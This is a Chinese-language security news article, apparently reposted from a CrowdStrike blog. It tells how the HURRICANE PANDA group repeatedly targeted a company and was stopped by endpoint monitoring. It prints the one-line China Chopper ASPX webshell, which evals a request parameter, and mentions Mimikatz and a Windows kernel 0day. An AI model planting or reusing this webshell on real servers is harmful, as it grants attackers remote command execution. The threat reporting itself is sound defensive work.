通常我们看到黑客入侵事件的报道大多为:某公司被黑客入侵了,检测到一未知行为,事件响应小组已介入调查和处理,客户和公众确定入侵行为结束,公司解除安全警报……你是不是也这样认为黑客入侵都是偶发性、短暂性的呢?
而APT(高级可持续性威胁)攻击并不是这样——真正有目的性的攻击者并不会考虑战斗或者使命什么时候结束,直至被发现或被踢出网络的那一刻才算暂时中止。他们的工作就是入侵到某网站,然后潜伏在其中。这其中的艰苦和所面对的困难只有他们自己知道,他们通常会连续工作几周甚至几个月,直至成功入侵。当然功夫不负有心人,大多数情况下都能成功。成功入侵之后,他们便会继续他们的主要工作,窃取敏感数据、使受害者宕机等。
成功入侵的心诀就是持之以恒。攻击者需要做好长久作战的准备,要知道攻击目标都不是傻子,他们可能很快就发现了你的攻击行为,并给予了还击,这个时候你就要另辟蹊径,重新寻找攻击突破口了。有时一次成功的入侵会循环往复好多次重复操作。
还有一种比较高效的还击方法——损毁攻击者的间谍情报技术和工具,这样既阻碍了入侵,还浪费了攻击者大量的时间和精力,一石二鸟有没有?
好了,废话有点多,该进入正题了……
背景
CrowdStrike公司官方博客上发表了一篇文章,宣称成功阻挡住了中国黑客组织飓风熊猫(HURRICANE PANDA)的网络攻击。CrowdStrike从2013年就开始调查飓风熊猫,并一直在与之斗争。
they are like a dog with a bone.(小编愚昧,比喻太过深奥,还是不翻为好……)
2014年4月底,一家遭到飓风熊猫攻击的公司向CrowdStrike公司寻求了帮助。CrowdStrike建议它立即在主机基础设施上部署他们的端点安全技术CrowdStrike Falcon。该技术可以让他们清楚的看到攻击者的行为:执行的命令、窃取的证书等,这样就大大节约了寻找修复方法的时间。所以这家公司在6月初的时候就完全修复了被攻击者利用的所有漏洞,也就是说飓风熊猫被成功踢了出去。
随之而来的是,重新发起攻击的飓风熊猫选择使用China Chopper webshell(中国菜刀)——它是一个微小、易被忽略且只有70字节的文本文件,里面包含一个‘eval()’命令,会为攻击者提供完整的命令执行权限和文件上传/下载能力。该脚本可以通过SQL注入或者WebDAV 漏洞上传至web服务器。
<%@Page Language="Jscript"%> <%eval(Request.Item["password"],"unsafe"); %>
一旦该脚本成功植入进受害者web服务器,攻击者会立即启动证书窃取工具(如 Mimikatz )。如果攻击者足够幸运,恰好在管理员登录web服务器的时候发动攻击的话,便可窃取到域名管理员证书,然后在webshell 终端执行‘net use’和‘wmic’命令,之后便可畅游受害者网络了。
而CrowdStrike很快检测并阻止了木马后门China Chopper webshell。
在为期4个月的尝试无果之后,飓风熊猫再次提升了他们的间谍情报技术并利用了Windows内核0day漏洞 (CVE-2014-4113),而且即便借助于0day漏洞也没能绝地反击,经过无数次攻击尝试失败后,HURRICANE PANDA终于放弃了。
* 参考来源 blog.crowdstrike.com ,转载请注明来自FreeBuf黑客与极客(FreeBuf.COM)